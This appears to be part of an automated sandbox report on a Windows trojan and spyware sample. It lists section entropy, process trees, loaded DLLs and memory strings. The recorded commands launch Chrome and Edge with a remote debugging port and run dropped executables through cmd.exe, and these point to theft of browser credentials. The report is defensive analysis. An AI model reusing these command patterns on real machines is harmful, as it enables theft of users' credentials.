                      Source: random[1].exe.2.drStatic PE information: Section: aqmlcjde ZLIB complexity 0.9947358521726365
                      Source: DocumentsGDHDHJEBGH.exe.2.drStatic PE information: Section: ZLIB complexity 0.9981000936648501
                      Source: DocumentsGDHDHJEBGH.exe.2.drStatic PE information: Section: aqmlcjde ZLIB complexity 0.9947358521726365
                      Source: skotes.exe.26.drStatic PE information: Section: ZLIB complexity 0.9981000936648501
                      Source: skotes.exe.26.drStatic PE information: Section: aqmlcjde ZLIB complexity 0.9947358521726365
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@72/296@29/29
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE50300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,2_2_6CE50300
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\YO36GW65.htmJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8524:120:WilError_03
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Users\user~1\AppData\Local\Temp\10a69c59-04c2-4ee2-9268-10eaab214f49.tmpJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                      Source: file.exe, 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000002.00000002.1863650681.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000002.00000002.1849289271.000000001DE20000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                      Source: file.exe, 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000002.00000002.1863650681.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000002.00000002.1849289271.000000001DE20000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                      Source: file.exe, 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000002.00000002.1863650681.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000002.00000002.1849289271.000000001DE20000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                      Source: file.exe, 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000002.00000002.1863650681.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000002.00000002.1849289271.000000001DE20000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                      Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                      Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                      Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                      Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                      Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                      Source: file.exe, file.exe, 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000002.00000002.1863650681.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000002.00000002.1849289271.000000001DE20000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                      Source: file.exe, 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000002.00000002.1863650681.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000002.00000002.1849289271.000000001DE20000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                      Source: file.exe, 00000002.00000002.1863650681.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000002.00000002.1849289271.000000001DE20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                      Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                      Source: file.exe, 00000002.00000003.1516472614.000000001DD29000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1605989001.000000001DD1D000.00000004.00000020.00020000.00000000.sdmp, EBAKKFHJDBKKEBFHDAAE.2.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: file.exe, 00000002.00000002.1863650681.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000002.00000002.1849289271.000000001DE20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                      Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                      Source: file.exe, 00000002.00000002.1863650681.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000002.00000002.1849289271.000000001DE20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                      Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                      Source: file.exeReversingLabs: Detection: 47%
                      Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                      Source: DocumentsGDHDHJEBGH.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                      Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                      Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                      Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                      Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 --field-trial-handle=2284,i,5232988169376499701,3184927908261316226,262144 /prefetch:8
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2532 --field-trial-handle=2196,i,16641813798157535699,2496316306201549847,262144 /prefetch:3
                      Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2728 --field-trial-handle=2272,i,3252984328910052623,10952965601817895583,262144 /prefetch:3
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6484 --field-trial-handle=2272,i,3252984328910052623,10952965601817895583,262144 /prefetch:8
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6708 --field-trial-handle=2272,i,3252984328910052623,10952965601817895583,262144 /prefetch:8
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsGDHDHJEBGH.exe"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\DocumentsGDHDHJEBGH.exe "C:\Users\user\DocumentsGDHDHJEBGH.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6740 --field-trial-handle=2272,i,3252984328910052623,10952965601817895583,262144 /prefetch:8
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsGDHDHJEBGH.exe"Jump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 --field-trial-handle=2284,i,5232988169376499701,3184927908261316226,262144 /prefetch:8Jump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2532 --field-trial-handle=2196,i,16641813798157535699,2496316306201549847,262144 /prefetch:3Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2728 --field-trial-handle=2272,i,3252984328910052623,10952965601817895583,262144 /prefetch:3
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6484 --field-trial-handle=2272,i,3252984328910052623,10952965601817895583,262144 /prefetch:8
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6708 --field-trial-handle=2272,i,3252984328910052623,10952965601817895583,262144 /prefetch:8
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6740 --field-trial-handle=2272,i,3252984328910052623,10952965601817895583,262144 /prefetch:8
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\DocumentsGDHDHJEBGH.exe "C:\Users\user\DocumentsGDHDHJEBGH.exe"
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe"
                      Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: mozglue.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: wsock32.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: msvcp140.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: pcacli.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeSection loaded: winmm.dll
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeSection loaded: wininet.dll
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeSection loaded: mstask.dll
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeSection loaded: wldp.dll
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeSection loaded: mpr.dll
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeSection loaded: dui70.dll
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeSection loaded: duser.dll
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeSection loaded: chartv.dll
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeSection loaded: oleacc.dll
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeSection loaded: atlthunk.dll
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeSection loaded: textinputframework.dll
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeSection loaded: coreuicomponents.dll
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeSection loaded: coremessaging.dll
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeSection loaded: ntmarta.dll
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeSection loaded: coremessaging.dll
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeSection loaded: wtsapi32.dll
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeSection loaded: winsta.dll
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeSection loaded: textshaping.dll
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeSection loaded: propsys.dll
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeSection loaded: explorerframe.dll
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeSection loaded: windows.fileexplorer.common.dll
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeSection loaded: profapi.dll
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeSection loaded: edputil.dll
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeSection loaded: netutils.dll
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeSection loaded: appresolver.dll
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeSection loaded: bcp47langs.dll
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeSection loaded: slc.dll
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeSection loaded: userenv.dll
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeSection loaded: sppc.dll
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wldp.dll
